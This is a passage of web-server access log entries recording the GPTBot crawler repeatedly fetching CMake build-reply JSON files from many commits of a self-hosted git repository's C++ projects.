192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19997] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35756] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12871] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13625] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12793] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13625] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13623] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13623] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35755] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19998] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13621] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13748] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 